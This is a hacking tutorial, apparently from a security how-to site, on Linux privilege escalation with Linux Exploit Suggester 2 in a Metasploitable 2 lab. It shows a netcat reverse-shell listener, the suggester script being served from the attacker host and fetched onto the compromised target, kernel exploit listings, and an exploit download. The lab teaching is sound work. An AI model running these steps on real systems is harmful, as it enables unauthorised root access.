Privilege escalation is one of the essential skills a hacker can have and often separates the newbies from the pros. With a continually changing landscape and a plethora of exploits out there, it can be a problematic aspect of any attack. Luckily, some tools can help expedite the process. Linux Exploit Suggester is just one of many to help you get root.
Privilege escalation is the act of gaining access to the privileges of another user on the system. It comes in two flavors: horizontal and vertical privilege escalation.
Horizontal privilege escalation is when an attacker gains access to another user account, typically with the same status and permissions. It can allow them access to additional systems or data but isn't quite as serious as its vertical cousin. Vertical privilege escalation is when an attacker obtains access to an account with elevated privileges, such as that of a system administrator.
Privilege escalation, especially the vertical kind, is vital for the attacker because it allows them to do things an average user wouldn't be able to. Unless the system is poorly configured, standard users can't usually execute malicious code or configure the system in dramatic ways that would benefit an attacker. That is why privilege escalation is vital for the complete compromise of a target.
Step 1: The Setup & Initial Compromise
To get started, we're using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup. When ready, we need to download Linux Exploit Suggester from GitHub.
Let's assume that the target has restricted access to the internet, so we'll need to have it on our local machine first and transfer it over to the target later. We can use wget to download the script directly from the terminal:
~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
--2020-02-18 12:15:58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: ‘linux-exploit-suggester-2.pl’
linux-exploit-suggester-2.pl 100%[======================================================================================================================>] 24.20K --.-KB/s in 0.03s
2020-02-18 12:15:58 (718 KB/s) - ‘linux-exploit-suggester-2.pl’ saved [24780/24780]Now we'll need to compromise the target and get shell access. Command injection is always a fun option. Then, once we catch the incoming connection, we can verify that we are the www-data user with the id command:
~# nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)From here, we will want to upgrade to a fully interactive TTY shell so we have more control and can use tab completion, command history, etc. Once we have upgraded our shell, we can navigate to a world-writable directory so we can receive and eventually run the tool:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shmStep 2: Transfer the Script to the Target
Back on our local machine, let's rename the script to something shorter:
~# mv linux-exploit-suggester-2.pl les2.plNow we can serve the script with Python's SimpleHTTPServer module — use the -m switch to specify the module:
~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...That will serve any content in the directory over HTTP on port 8000.
Back on the target, we can use wget again to retrieve the script from our local machine:
www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl
--13:43:17-- http://10.10.0.1:8000/les2.pl
=> `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]
100%[=========================================================================================================================================================================>] 24,780 --.--K/s
13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]Once that completes, we can kill the Python server. Now we can take a look at the current permissions of our script that we just transferred over:
www-data@metasploitable:/dev/shm$ ls -la
total 28
drwxrwxrwt 2 root root 60 Jun 19 13:43 .
drwxr-xr-x 13 root root 13480 Jun 19 13:28 ..
-rw-r--r-- 1 www-data www-data 24780 Feb 18 2020 les2.plWe can see that it's read-only at this point, so use the chmod command to make it executable:
www-data@metasploitable:/dev/shm$ chmod +x les2.plFinally, we're all set to run the script.
Step 3: Run Linux Exploit Suggester
Since we made it executable, we can use the dot-slash to run Linux Exploit Suggester. Use the -h flag to see the help menu and usage example:
www-data@metasploitable:/dev/shm$ ./les2.pl -h
#############################
Linux Exploit Suggester 2
#############################
Usage: ./les2.pl [-h] [-k kernel] [-d]
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.The most basic way to use the tool is running it without any options:
www-data@metasploitable:/dev/shm$ ./les2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.24
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[5] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[9] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[11] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[12] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[13] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[14] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[15] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[16] vmsplice1
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[17] vmsplice2
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093Linux Exploit Suggester works by grabbing the kernel version and comparing it to a list of possible exploits. Above, we can see it returned a handful of potential exploits, listing the respective name, CVE number, and link to the source.
We can also use the -k switch to specify the kernel version manually. Let's confirm the kernel number with the uname -r command:
www-data@metasploitable:/dev/shm$ uname -r
2.6.24-16-serverInstead of using the exact version number, we can truncate it to 2.6 since systems can often be vulnerable to slightly older exploits as well:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093We can see that it gave us a much larger pool of possible exploits.
The last option Linux Exploit Suggester provides is the ability to automatically download exploit scripts for any matches it finds. Use the -d flag to enable the option:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download:After it determines the potential exploits, we are presented with an option to download either all scripts or individual scripts. For example, if we wanted to download the udev exploit, we would simply input its respective number ID:
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download: 41
Downloading https://www.exploit-db.com/raw/8478 -> exploit_udevKeep in mind, the feature requires an active internet connection, so if access is restricted in any way, it won't work. Still, Linux Exploit Suggester makes it extremely easy to get the exploit script right on the target. From this point, it's just a matter of escalating privileges to get root.
Wrapping Up
In this tutorial, we learned about privilege escalation and a tool called Linux Exploit Suggester. We began with an initial compromise and transferred the script to the target. We were then able to run it and cover a few of its usage options to discover possible exploits that could be used to get root. Privilege escalation is an integral part of any hacker's methodology, and Linux Exploit Suggester is just one tool to aid in that goal.
Cover image by Pedro Sandrini/Pexels
Comments
No Comments Exist
Be the first, drop a comment!